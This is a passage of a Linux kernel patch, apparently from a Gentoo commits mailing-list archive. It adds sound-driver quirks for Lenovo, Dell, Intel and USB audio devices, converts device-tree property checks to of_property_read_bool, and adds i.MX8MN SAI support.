+ 	SND_PCI_QUIRK(0x10f7, 0x8338, "Panasonic CF-SZ6", ALC269_FIXUP_HEADSET_MODE),
+ 	SND_PCI_QUIRK(0x144d, 0xc109, "Samsung Ativ book 9 (NP900X3G)", ALC269_FIXUP_INV_DMIC),
+ 	SND_PCI_QUIRK(0x144d, 0xc169, "Samsung Notebook 9 Pen (NP930SBE-K01US)", ALC298_FIXUP_SAMSUNG_AMP),
+@@ -9831,14 +9896,14 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x22be, "Thinkpad X1 Carbon 8th", ALC285_FIXUP_THINKPAD_HEADSET_JACK),
+ 	SND_PCI_QUIRK(0x17aa, 0x22c1, "Thinkpad P1 Gen 3", ALC285_FIXUP_THINKPAD_NO_BASS_SPK_HEADSET_JACK),
+ 	SND_PCI_QUIRK(0x17aa, 0x22c2, "Thinkpad X1 Extreme Gen 3", ALC285_FIXUP_THINKPAD_NO_BASS_SPK_HEADSET_JACK),
+-	SND_PCI_QUIRK(0x17aa, 0x22f1, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
+-	SND_PCI_QUIRK(0x17aa, 0x22f2, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
+-	SND_PCI_QUIRK(0x17aa, 0x22f3, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
+-	SND_PCI_QUIRK(0x17aa, 0x2316, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
+-	SND_PCI_QUIRK(0x17aa, 0x2317, "Thinkpad P1 Gen 6", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
+-	SND_PCI_QUIRK(0x17aa, 0x2318, "Thinkpad Z13 Gen2", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
+-	SND_PCI_QUIRK(0x17aa, 0x2319, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
+-	SND_PCI_QUIRK(0x17aa, 0x231a, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2_THINKPAD_ACPI),
++	SND_PCI_QUIRK(0x17aa, 0x22f1, "Thinkpad", ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD),
++	SND_PCI_QUIRK(0x17aa, 0x22f2, "Thinkpad", ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD),
++	SND_PCI_QUIRK(0x17aa, 0x22f3, "Thinkpad", ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD),
++	SND_PCI_QUIRK(0x17aa, 0x2316, "Thinkpad P1 Gen 6", ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD),
++	SND_PCI_QUIRK(0x17aa, 0x2317, "Thinkpad P1 Gen 6", ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD),
++	SND_PCI_QUIRK(0x17aa, 0x2318, "Thinkpad Z13 Gen2", ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD),
++	SND_PCI_QUIRK(0x17aa, 0x2319, "Thinkpad Z16 Gen2", ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD),
++	SND_PCI_QUIRK(0x17aa, 0x231a, "Thinkpad Z16 Gen2", ALC287_FIXUP_MG_RTKC_CSAMP_CS35L41_I2C_THINKPAD),
+ 	SND_PCI_QUIRK(0x17aa, 0x30bb, "ThinkCentre AIO", ALC233_FIXUP_LENOVO_LINE2_MIC_HOTKEY),
+ 	SND_PCI_QUIRK(0x17aa, 0x30e2, "ThinkCentre AIO", ALC233_FIXUP_LENOVO_LINE2_MIC_HOTKEY),
+ 	SND_PCI_QUIRK(0x17aa, 0x310c, "ThinkCentre Station", ALC294_FIXUP_LENOVO_MIC_LOCATION),
+@@ -9920,7 +9985,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x8086, 0x2074, "Intel NUC 8", ALC233_FIXUP_INTEL_NUC8_DMIC),
+ 	SND_PCI_QUIRK(0x8086, 0x2080, "Intel NUC 8 Rugged", ALC256_FIXUP_INTEL_NUC8_RUGGED),
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", ALC256_FIXUP_INTEL_NUC10),
+-	SND_PCI_QUIRK(0x8086, 0x3038, "Intel NUC 13", ALC225_FIXUP_HEADSET_JACK),
++	SND_PCI_QUIRK(0x8086, 0x3038, "Intel NUC 13", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0xf111, 0x0001, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
+ 
+ #if 0
+@@ -10402,6 +10467,10 @@ static const struct snd_hda_pin_quirk alc269_pin_fixup_tbl[] = {
+ 		{0x17, 0x90170111},
+ 		{0x19, 0x03a11030},
+ 		{0x21, 0x03211020}),
++	SND_HDA_PIN_QUIRK(0x10ec0287, 0x17aa, "Lenovo", ALC287_FIXUP_THINKPAD_I2S_SPK,
++		{0x17, 0x90170110},
++		{0x19, 0x03a11030},
++		{0x21, 0x03211020}),
+ 	SND_HDA_PIN_QUIRK(0x10ec0286, 0x1025, "Acer", ALC286_FIXUP_ACER_AIO_MIC_NO_PRESENCE,
+ 		{0x12, 0x90a60130},
+ 		{0x17, 0x90170110},
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 533250efcbd83..c494de5f5c066 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -234,6 +234,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "82V2"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "LENOVO"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "82YM"),
++		}
++	},
+ 	{
+ 		.driver_data = &acp6x_card,
+ 		.matches = {
+diff --git a/sound/soc/codecs/sta32x.c b/sound/soc/codecs/sta32x.c
+index 8c86b578eba83..29af9595dac19 100644
+--- a/sound/soc/codecs/sta32x.c
++++ b/sound/soc/codecs/sta32x.c
+@@ -1054,35 +1054,32 @@ static int sta32x_probe_dt(struct device *dev, struct sta32x_priv *sta32x)
+ 	of_property_read_u8(np, "st,ch3-output-mapping",
+ 			    &pdata->ch3_output_mapping);
+ 
+-	if (of_get_property(np, "st,fault-detect-recovery", NULL))
+-		pdata->fault_detect_recovery = 1;
+-	if (of_get_property(np, "st,thermal-warning-recovery", NULL))
+-		pdata->thermal_warning_recovery = 1;
+-	if (of_get_property(np, "st,thermal-warning-adjustment", NULL))
+-		pdata->thermal_warning_adjustment = 1;
+-	if (of_get_property(np, "st,needs_esd_watchdog", NULL))
+-		pdata->needs_esd_watchdog = 1;
++	pdata->fault_detect_recovery =
++		of_property_read_bool(np, "st,fault-detect-recovery");
++	pdata->thermal_warning_recovery =
++		of_property_read_bool(np, "st,thermal-warning-recovery");
++	pdata->thermal_warning_adjustment =
++		of_property_read_bool(np, "st,thermal-warning-adjustment");
++	pdata->needs_esd_watchdog =
++		of_property_read_bool(np, "st,needs_esd_watchdog");
+ 
+ 	tmp = 140;
+ 	of_property_read_u16(np, "st,drop-compensation-ns", &tmp);
+ 	pdata->drop_compensation_ns = clamp_t(u16, tmp, 0, 300) / 20;
+ 
+ 	/* CONFE */
+-	if (of_get_property(np, "st,max-power-use-mpcc", NULL))
+-		pdata->max_power_use_mpcc = 1;
+-
+-	if (of_get_property(np, "st,max-power-correction", NULL))
+-		pdata->max_power_correction = 1;
+-
+-	if (of_get_property(np, "st,am-reduction-mode", NULL))
+-		pdata->am_reduction_mode = 1;
+-
+-	if (of_get_property(np, "st,odd-pwm-speed-mode", NULL))
+-		pdata->odd_pwm_speed_mode = 1;
++	pdata->max_power_use_mpcc =
++		of_property_read_bool(np, "st,max-power-use-mpcc");
++	pdata->max_power_correction =
++		of_property_read_bool(np, "st,max-power-correction");
++	pdata->am_reduction_mode =
++		of_property_read_bool(np, "st,am-reduction-mode");
++	pdata->odd_pwm_speed_mode =
++		of_property_read_bool(np, "st,odd-pwm-speed-mode");
+ 
+ 	/* CONFF */
+-	if (of_get_property(np, "st,invalid-input-detect-mute", NULL))
+-		pdata->invalid_input_detect_mute = 1;
++	pdata->invalid_input_detect_mute =
++		of_property_read_bool(np, "st,invalid-input-detect-mute");
+ 
+ 	sta32x->pdata = pdata;
+ 
+diff --git a/sound/soc/codecs/sta350.c b/sound/soc/codecs/sta350.c
+index 9ed13aeb3cbdc..b033a5fcd6c04 100644
+--- a/sound/soc/codecs/sta350.c
++++ b/sound/soc/codecs/sta350.c
+@@ -1106,12 +1106,12 @@ static int sta350_probe_dt(struct device *dev, struct sta350_priv *sta350)
+ 	of_property_read_u8(np, "st,ch3-output-mapping",
+ 			    &pdata->ch3_output_mapping);
+ 
+-	if (of_get_property(np, "st,thermal-warning-recovery", NULL))
+-		pdata->thermal_warning_recovery = 1;
+-	if (of_get_property(np, "st,thermal-warning-adjustment", NULL))
+-		pdata->thermal_warning_adjustment = 1;
+-	if (of_get_property(np, "st,fault-detect-recovery", NULL))
+-		pdata->fault_detect_recovery = 1;
++	pdata->thermal_warning_recovery =
++		of_property_read_bool(np, "st,thermal-warning-recovery");
++	pdata->thermal_warning_adjustment =
++		of_property_read_bool(np, "st,thermal-warning-adjustment");
++	pdata->fault_detect_recovery =
++		of_property_read_bool(np, "st,fault-detect-recovery");
+ 
+ 	pdata->ffx_power_output_mode = STA350_FFX_PM_VARIABLE_DROP_COMP;
+ 	if (!of_property_read_string(np, "st,ffx-power-output-mode",
+@@ -1133,41 +1133,34 @@ static int sta350_probe_dt(struct device *dev, struct sta350_priv *sta350)
+ 	of_property_read_u16(np, "st,drop-compensation-ns", &tmp);
+ 	pdata->drop_compensation_ns = clamp_t(u16, tmp, 0, 300) / 20;
+ 
+-	if (of_get_property(np, "st,overcurrent-warning-adjustment", NULL))
+-		pdata->oc_warning_adjustment = 1;
++	pdata->oc_warning_adjustment =
++		of_property_read_bool(np, "st,overcurrent-warning-adjustment");
+ 
+ 	/* CONFE */
+-	if (of_get_property(np, "st,max-power-use-mpcc", NULL))
+-		pdata->max_power_use_mpcc = 1;
+-
+-	if (of_get_property(np, "st,max-power-correction", NULL))
+-		pdata->max_power_correction = 1;
+-
+-	if (of_get_property(np, "st,am-reduction-mode", NULL))
+-		pdata->am_reduction_mode = 1;
+-
+-	if (of_get_property(np, "st,odd-pwm-speed-mode", NULL))
+-		pdata->odd_pwm_speed_mode = 1;
+-
+-	if (of_get_property(np, "st,distortion-compensation", NULL))
+-		pdata->distortion_compensation = 1;
++	pdata->max_power_use_mpcc =
++		of_property_read_bool(np, "st,max-power-use-mpcc");
++	pdata->max_power_correction =
++		of_property_read_bool(np, "st,max-power-correction");
++	pdata->am_reduction_mode =
++		of_property_read_bool(np, "st,am-reduction-mode");
++	pdata->odd_pwm_speed_mode =
++		of_property_read_bool(np, "st,odd-pwm-speed-mode");
++	pdata->distortion_compensation =
++		of_property_read_bool(np, "st,distortion-compensation");
+ 
+ 	/* CONFF */
+-	if (of_get_property(np, "st,invalid-input-detect-mute", NULL))
+-		pdata->invalid_input_detect_mute = 1;
++	pdata->invalid_input_detect_mute =
++		of_property_read_bool(np, "st,invalid-input-detect-mute");
+ 
+ 	/* MISC */
+-	if (of_get_property(np, "st,activate-mute-output", NULL))
+-		pdata->activate_mute_output = 1;
+-
+-	if (of_get_property(np, "st,bridge-immediate-off", NULL))
+-		pdata->bridge_immediate_off = 1;
+-
+-	if (of_get_property(np, "st,noise-shape-dc-cut", NULL))
+-		pdata->noise_shape_dc_cut = 1;
+-
+-	if (of_get_property(np, "st,powerdown-master-volume", NULL))
+-		pdata->powerdown_master_vol = 1;
++	pdata->activate_mute_output =
++		of_property_read_bool(np, "st,activate-mute-output");
++	pdata->bridge_immediate_off =
++		of_property_read_bool(np, "st,bridge-immediate-off");
++	pdata->noise_shape_dc_cut =
++		of_property_read_bool(np, "st,noise-shape-dc-cut");
++	pdata->powerdown_master_vol =
++		of_property_read_bool(np, "st,powerdown-master-volume");
+ 
+ 	if (!of_property_read_u8(np, "st,powerdown-delay-divider", &tmp8)) {
+ 		if (is_power_of_2(tmp8) && tmp8 >= 1 && tmp8 <= 128)
+diff --git a/sound/soc/codecs/tas5086.c b/sound/soc/codecs/tas5086.c
+index 22143cc5afa70..f9e7122894bd2 100644
+--- a/sound/soc/codecs/tas5086.c
++++ b/sound/soc/codecs/tas5086.c
+@@ -840,7 +840,7 @@ static int tas5086_probe(struct snd_soc_component *component)
+ 			snprintf(name, sizeof(name),
+ 				 "ti,mid-z-channel-%d", i + 1);
+ 
+-			if (of_get_property(of_node, name, NULL) != NULL)
++			if (of_property_read_bool(of_node, name))
+ 				priv->pwm_start_mid_z |= 1 << i;
+ 		}
+ 	}
+diff --git a/sound/soc/fsl/fsl_sai.c b/sound/soc/fsl/fsl_sai.c
+index b7552b0df7c3c..96fd9095e544b 100644
+--- a/sound/soc/fsl/fsl_sai.c
++++ b/sound/soc/fsl/fsl_sai.c
+@@ -710,10 +710,15 @@ static void fsl_sai_config_disable(struct fsl_sai *sai, int dir)
+ {
+ 	unsigned int ofs = sai->soc_data->reg_offset;
+ 	bool tx = dir == TX;
+-	u32 xcsr, count = 100;
++	u32 xcsr, count = 100, mask;
++
++	if (sai->soc_data->mclk_with_tere && sai->mclk_direction_output)
++		mask = FSL_SAI_CSR_TERE;
++	else
++		mask = FSL_SAI_CSR_TERE | FSL_SAI_CSR_BCE;
+ 
+ 	regmap_update_bits(sai->regmap, FSL_SAI_xCSR(tx, ofs),
+-			   FSL_SAI_CSR_TERE | FSL_SAI_CSR_BCE, 0);
++			   mask, 0);
+ 
+ 	/* TERE will remain set till the end of current frame */
+ 	do {
+@@ -1381,18 +1386,18 @@ static int fsl_sai_probe(struct platform_device *pdev)
+ 	sai->cpu_dai_drv.symmetric_channels = 1;
+ 	sai->cpu_dai_drv.symmetric_sample_bits = 1;
+ 
+-	if (of_find_property(np, "fsl,sai-synchronous-rx", NULL) &&
+-	    of_find_property(np, "fsl,sai-asynchronous", NULL)) {
++	if (of_property_read_bool(np, "fsl,sai-synchronous-rx") &&
++	    of_property_read_bool(np, "fsl,sai-asynchronous")) {
+ 		/* error out if both synchronous and asynchronous are present */
+ 		dev_err(dev, "invalid binding for synchronous mode\n");
+ 		return -EINVAL;
+ 	}
+ 
+-	if (of_find_property(np, "fsl,sai-synchronous-rx", NULL)) {
++	if (of_property_read_bool(np, "fsl,sai-synchronous-rx")) {
+ 		/* Sync Rx with Tx */
+ 		sai->synchronous[RX] = false;
+ 		sai->synchronous[TX] = true;
+-	} else if (of_find_property(np, "fsl,sai-asynchronous", NULL)) {
++	} else if (of_property_read_bool(np, "fsl,sai-asynchronous")) {
+ 		/* Discard all settings for asynchronous mode */
+ 		sai->synchronous[RX] = false;
+ 		sai->synchronous[TX] = false;
+@@ -1401,7 +1406,9 @@ static int fsl_sai_probe(struct platform_device *pdev)
+ 		sai->cpu_dai_drv.symmetric_sample_bits = 0;
+ 	}
+ 
+-	if (of_find_property(np, "fsl,sai-mclk-direction-output", NULL) &&
++	sai->mclk_direction_output = of_property_read_bool(np, "fsl,sai-mclk-direction-output");
++
++	if (sai->mclk_direction_output &&
+ 	    of_device_is_compatible(np, "fsl,imx6ul-sai")) {
+ 		gpr = syscon_regmap_lookup_by_compatible("fsl,imx6ul-iomuxc-gpr");
+ 		if (IS_ERR(gpr)) {
+@@ -1442,7 +1449,7 @@ static int fsl_sai_probe(struct platform_device *pdev)
+ 		dev_warn(dev, "Error reading SAI version: %d\n", ret);
+ 
+ 	/* Select MCLK direction */
+-	if (of_find_property(np, "fsl,sai-mclk-direction-output", NULL) &&
++	if (sai->mclk_direction_output &&
+ 	    sai->soc_data->max_register >= FSL_SAI_MCTL) {
+ 		regmap_update_bits(sai->regmap, FSL_SAI_MCTL,
+ 				   FSL_SAI_MCTL_MCLK_EN, FSL_SAI_MCTL_MCLK_EN);
+@@ -1560,6 +1567,17 @@ static const struct fsl_sai_soc_data fsl_sai_imx8mm_data = {
+ 	.max_register = FSL_SAI_MCTL,
+ };
+ 
++static const struct fsl_sai_soc_data fsl_sai_imx8mn_data = {
++	.use_imx_pcm = true,
++	.use_edma = false,
++	.fifo_depth = 128,
++	.reg_offset = 8,
++	.mclk0_is_mclk1 = false,
++	.pins = 8,
++	.flags = 0,
++	.max_register = FSL_SAI_MDIV,
++};
++
+ static const struct fsl_sai_soc_data fsl_sai_imx8mp_data = {
+ 	.use_imx_pcm = true,
+ 	.use_edma = false,
+@@ -1569,6 +1587,7 @@ static const struct fsl_sai_soc_data fsl_sai_imx8mp_data = {
+ 	.pins = 8,
+ 	.flags = 0,
+ 	.max_register = FSL_SAI_MDIV,
++	.mclk_with_tere = true,
+ };
+ 
+ static const struct fsl_sai_soc_data fsl_sai_imx8ulp_data = {
+@@ -1592,7 +1611,7 @@ static const struct of_device_id fsl_sai_ids[] = {
+ 	{ .compatible = "fsl,imx8mm-sai", .data = &fsl_sai_imx8mm_data },
+ 	{ .compatible = "fsl,imx8mp-sai", .data = &fsl_sai_imx8mp_data },
+ 	{ .compatible = "fsl,imx8ulp-sai", .data = &fsl_sai_imx8ulp_data },
+-	{ .compatible = "fsl,imx8mn-sai", .data = &fsl_sai_imx8mp_data },
++	{ .compatible = "fsl,imx8mn-sai", .data = &fsl_sai_imx8mn_data },
+ 	{ /* sentinel */ }
+ };
+ MODULE_DEVICE_TABLE(of, fsl_sai_ids);
+@@ -1656,6 +1675,10 @@ static int fsl_sai_runtime_resume(struct device *dev)
+ 	if (ret)
+ 		goto disable_rx_clk;
+ 
++	if (sai->soc_data->mclk_with_tere && sai->mclk_direction_output)
++		regmap_update_bits(sai->regmap, FSL_SAI_TCSR(ofs),
++				   FSL_SAI_CSR_TERE, FSL_SAI_CSR_TERE);
++
+ 	return 0;
+ 
+ disable_rx_clk:
+diff --git a/sound/soc/fsl/fsl_sai.h b/sound/soc/fsl/fsl_sai.h
+index caad5b0ac4ff4..b4d616a44023c 100644
+--- a/sound/soc/fsl/fsl_sai.h
++++ b/sound/soc/fsl/fsl_sai.h
+@@ -232,6 +232,7 @@ struct fsl_sai_soc_data {
+ 	bool use_imx_pcm;
+ 	bool use_edma;
+ 	bool mclk0_is_mclk1;
++	bool mclk_with_tere;
+ 	unsigned int fifo_depth;
+ 	unsigned int pins;
+ 	unsigned int reg_offset;
+@@ -288,6 +289,7 @@ struct fsl_sai {
+ 	bool synchronous[2];
+ 	struct fsl_sai_dl_cfg *dl_cfg;
+ 	unsigned int dl_cfg_cnt;
++	bool mclk_direction_output;
+ 
+ 	unsigned int mclk_id[2];
+ 	unsigned int mclk_streams;
+diff --git a/sound/soc/fsl/fsl_ssi.c b/sound/soc/fsl/fsl_ssi.c
+index 46a53551b955c..6af00b62a60fa 100644
+--- a/sound/soc/fsl/fsl_ssi.c
++++ b/sound/soc/fsl/fsl_ssi.c
+@@ -1447,7 +1447,7 @@ static int fsl_ssi_probe_from_dt(struct fsl_ssi *ssi)
+ 			return -EINVAL;
+ 		}
+ 		strcpy(ssi->card_name, "ac97-codec");
+-	} else if (!of_find_property(np, "fsl,ssi-asynchronous", NULL)) {
++	} else if (!of_property_read_bool(np, "fsl,ssi-asynchronous")) {
+ 		/*
+ 		 * In synchronous mode, STCK and STFS ports are used by RX
+ 		 * as well. So the software should limit the sample rates,
+diff --git a/sound/soc/fsl/imx-card.c b/sound/soc/fsl/imx-card.c
+index 3f128ced41809..64a4d7e9db603 100644
+--- a/sound/soc/fsl/imx-card.c
++++ b/sound/soc/fsl/imx-card.c
+@@ -563,7 +563,7 @@ static int imx_card_parse_of(struct imx_card_data *data)
+ 			link_data->cpu_sysclk_id = FSL_SAI_CLK_MAST1;
+ 
+ 			/* sai may support mclk/bclk = 1 */
+-			if (of_find_property(np, "fsl,mclk-equal-bclk", NULL)) {
++			if (of_property_read_bool(np, "fsl,mclk-equal-bclk")) {
+ 				link_data->one2one_ratio = true;
+ 			} else {
+ 				int i;
+diff --git a/sound/soc/generic/simple-card-utils.c b/sound/soc/generic/simple-card-utils.c
+index 8811321717fbb..c719354635a3a 100644
+--- a/sound/soc/generic/simple-card-utils.c
++++ b/sound/soc/generic/simple-card-utils.c
+@@ -331,7 +331,8 @@ int asoc_simple_startup(struct snd_pcm_substream *substream)
+ 		if (fixed_sysclk % props->mclk_fs) {
+ 			dev_err(rtd->dev, "fixed sysclk %u not divisible by mclk_fs %u\n",
+ 				fixed_sysclk, props->mclk_fs);
+-			return -EINVAL;
++			ret = -EINVAL;
++			goto codec_err;
+ 		}
+ 		ret = snd_pcm_hw_constraint_minmax(substream->runtime, SNDRV_PCM_HW_PARAM_RATE,
+ 			fixed_rate, fixed_rate);
+diff --git a/sound/soc/intel/boards/sof_es8336.c b/sound/soc/intel/boards/sof_es8336.c
+index 894b6610b9e27..e22d767b6e97a 100644
+--- a/sound/soc/intel/boards/sof_es8336.c
++++ b/sound/soc/intel/boards/sof_es8336.c
+@@ -807,6 +807,16 @@ static const struct platform_device_id board_ids[] = {
+ 					SOF_ES8336_SPEAKERS_EN_GPIO1_QUIRK |
+ 					SOF_ES8336_JD_INVERTED),
+ 	},
++	{
++		.name = "mtl_es83x6_c1_h02",
++		.driver_data = (kernel_ulong_t)(SOF_ES8336_SSP_CODEC(1) |
++					SOF_NO_OF_HDMI_CAPTURE_SSP(2) |
++					SOF_HDMI_CAPTURE_1_SSP(0) |
++					SOF_HDMI_CAPTURE_2_SSP(2) |
++					SOF_SSP_HDMI_CAPTURE_PRESENT |
++					SOF_ES8336_SPEAKERS_EN_GPIO1_QUIRK |
++					SOF_ES8336_JD_INVERTED),
++	},
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(platform, board_ids);
+diff --git a/sound/soc/intel/boards/sof_sdw.c b/sound/soc/intel/boards/sof_sdw.c
+index 414ac90273810..985012f2003e2 100644
+--- a/sound/soc/intel/boards/sof_sdw.c
++++ b/sound/soc/intel/boards/sof_sdw.c
+@@ -347,6 +347,16 @@ static const struct dmi_system_id sof_sdw_quirk_table[] = {
+ 		/* No Jack */
+ 		.driver_data = (void *)SOF_SDW_TGL_HDMI,
+ 	},
++	{
++		.callback = sof_sdw_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Dell Inc"),
++			DMI_EXACT_MATCH(DMI_PRODUCT_SKU, "0B14"),
++		},
++		/* No Jack */
++		.driver_data = (void *)SOF_SDW_TGL_HDMI,
++	},
++
+ 	{
+ 		.callback = sof_sdw_quirk_cb,
+ 		.matches = {
+diff --git a/sound/soc/intel/common/soc-acpi-intel-mtl-match.c b/sound/soc/intel/common/soc-acpi-intel-mtl-match.c
+index 36c361fb28a4d..d3b4689460ecf 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-mtl-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-mtl-match.c
+@@ -20,6 +20,16 @@ static const struct snd_soc_acpi_codecs mtl_rt5682_rt5682s_hp = {
+ 	.codecs = {"10EC5682", "RTL5682"},
+ };
+ 
++static const struct snd_soc_acpi_codecs mtl_lt6911_hdmi = {
++	.num_codecs = 1,
++	.codecs = {"INTC10B0"}
++};
++
++static const struct snd_soc_acpi_codecs mtl_essx_83x6 = {
++	.num_codecs = 3,
++	.codecs = { "ESSX8316", "ESSX8326", "ESSX8336"},
++};
++
+ struct snd_soc_acpi_mach snd_soc_acpi_intel_mtl_machines[] = {
+ 	{
+ 		.comp_ids = &mtl_rt5682_rt5682s_hp,
+@@ -28,6 +38,14 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_mtl_machines[] = {
+ 		.quirk_data = &mtl_max98357a_amp,
+ 		.sof_tplg_filename = "sof-mtl-max98357a-rt5682.tplg",
+ 	},
++	{
++		.comp_ids = &mtl_essx_83x6,
++		.drv_name = "sof-essx8336",
++		.sof_tplg_filename = "sof-mtl-es8336", /* the tplg suffix is added at run time */
++		.tplg_quirk_mask = SND_SOC_ACPI_TPLG_INTEL_SSP_NUMBER |
++					SND_SOC_ACPI_TPLG_INTEL_SSP_MSB |
++					SND_SOC_ACPI_TPLG_INTEL_DMIC_NUMBER,
++	},
+ 	{},
+ };
+ EXPORT_SYMBOL_GPL(snd_soc_acpi_intel_mtl_machines);
+@@ -66,6 +84,13 @@ struct snd_soc_acpi_mach snd_soc_acpi_intel_mtl_sdw_machines[] = {
+ 		.drv_name = "sof_sdw",
+ 		.sof_tplg_filename = "sof-mtl-rt711-rt1308-rt715.tplg",
+ 	},
++	{
++		.comp_ids = &mtl_essx_83x6,
++		.drv_name = "mtl_es83x6_c1_h02",
++		.machine_quirk = snd_soc_acpi_codec_list,
++		.quirk_data = &mtl_lt6911_hdmi,
++		.sof_tplg_filename = "sof-mtl-es83x6-ssp1-hdmi-ssp02.tplg",
++	},
+ 	{
+ 		.link_mask = BIT(0) | BIT(1) | BIT(3),
+ 		.links = sdw_mockup_headset_1amp_mic,
+diff --git a/sound/soc/sh/rcar/ssi.c b/sound/soc/sh/rcar/ssi.c
+index 7ade6c5ed96ff..cb7fff48959a2 100644
+--- a/sound/soc/sh/rcar/ssi.c
++++ b/sound/soc/sh/rcar/ssi.c
+@@ -1208,10 +1208,10 @@ int rsnd_ssi_probe(struct rsnd_priv *priv)
+ 			goto rsnd_ssi_probe_done;
+ 		}
+ 
+-		if (of_get_property(np, "shared-pin", NULL))
++		if (of_property_read_bool(np, "shared-pin"))
+ 			rsnd_flags_set(ssi, RSND_SSI_CLK_PIN_SHARE);
+ 
+-		if (of_get_property(np, "no-busif", NULL))
++		if (of_property_read_bool(np, "no-busif"))
+ 			rsnd_flags_set(ssi, RSND_SSI_NO_BUSIF);
+ 
+ 		ssi->irq = irq_of_parse_and_map(np, 0);
+diff --git a/sound/soc/sof/amd/pci-rmb.c b/sound/soc/sof/amd/pci-rmb.c
+index 5698d910b26f3..6fa060cab657e 100644
+--- a/sound/soc/sof/amd/pci-rmb.c
++++ b/sound/soc/sof/amd/pci-rmb.c
+@@ -54,7 +54,6 @@ static const struct sof_amd_acp_desc rembrandt_chip_info = {
+ 	.sram_pte_offset = ACP6X_SRAM_PTE_OFFSET,
+ 	.i2s_pin_config_offset = ACP6X_I2S_PIN_CONFIG,
+ 	.hw_semaphore_offset = ACP6X_AXI2DAGB_SEM_0,
+-	.acp_clkmux_sel = ACP6X_CLKMUX_SEL,
+ 	.fusion_dsp_offset = ACP6X_DSP_FUSION_RUNSTALL,
+ };
+ 
+diff --git a/sound/usb/mixer.c b/sound/usb/mixer.c
+index 9105ec623120a..783a2493707ea 100644
+--- a/sound/usb/mixer.c
++++ b/sound/usb/mixer.c
+@@ -1204,6 +1204,13 @@ static void volume_control_quirks(struct usb_mixer_elem_info *cval,
+ 			cval->res = 16;
+ 		}
+ 		break;
++	case USB_ID(0x1bcf, 0x2283): /* NexiGo N930AF FHD Webcam */
++		if (!strcmp(kctl->id.name, "Mic Capture Volume")) {
++			usb_audio_info(chip,
++				"set resolution quirk: cval->res = 16\n");
++			cval->res = 16;
++		}
++		break;
+ 	}
+ }
+ 
+diff --git a/sound/usb/quirks.c b/sound/usb/quirks.c
+index 4667d543f7481..6129a62316422 100644
+--- a/sound/usb/quirks.c
++++ b/sound/usb/quirks.c
+@@ -1992,7 +1992,11 @@ void snd_usb_audioformat_attributes_quirk(struct snd_usb_audio *chip,
+ 		/* mic works only when ep packet size is set to wMaxPacketSize */
+ 		fp->attributes |= UAC_EP_CS_ATTR_FILL_MAX;
+ 		break;
+-
++	case USB_ID(0x3511, 0x2b1e): /* Opencomm2 UC USB Bluetooth dongle */
++		/* mic works only when ep pitch control is not set */
++		if (stream == SNDRV_PCM_STREAM_CAPTURE)
++			fp->attributes &= ~UAC_EP_CS_ATTR_PITCH_CONTROL;
++		break;
+ 	}
+ }
+ 
+@@ -2171,6 +2175,8 @@ static const struct usb_audio_quirk_flags_table quirk_flags_table[] = {
+ 		   QUIRK_FLAG_FIXED_RATE),
+ 	DEVICE_FLG(0x0ecb, 0x2069, /* JBL Quantum810 Wireless */
+ 		   QUIRK_FLAG_FIXED_RATE),
++	DEVICE_FLG(0x1bcf, 0x2283, /* NexiGo N930AF FHD Webcam */
++		   QUIRK_FLAG_GET_SAMPLE_RATE),
+ 
+ 	/* Vendor matches */
+ 	VENDOR_FLG(0x045e, /* MS Lifecam */


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-10-18 20:04 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-10-18 20:04 UTC (permalink / raw
  To: gentoo-commits

commit:     2946d45ccac2c25c38654d1f380feab6f5672191
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Oct 18 20:04:34 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Oct 18 20:04:34 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2946d45c

TAR override and gcc 14 patch

kheaders: make it possible to override TAR
gcc-plugins: Rename last_stmt() for GCC 14+

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                               |  8 ++++
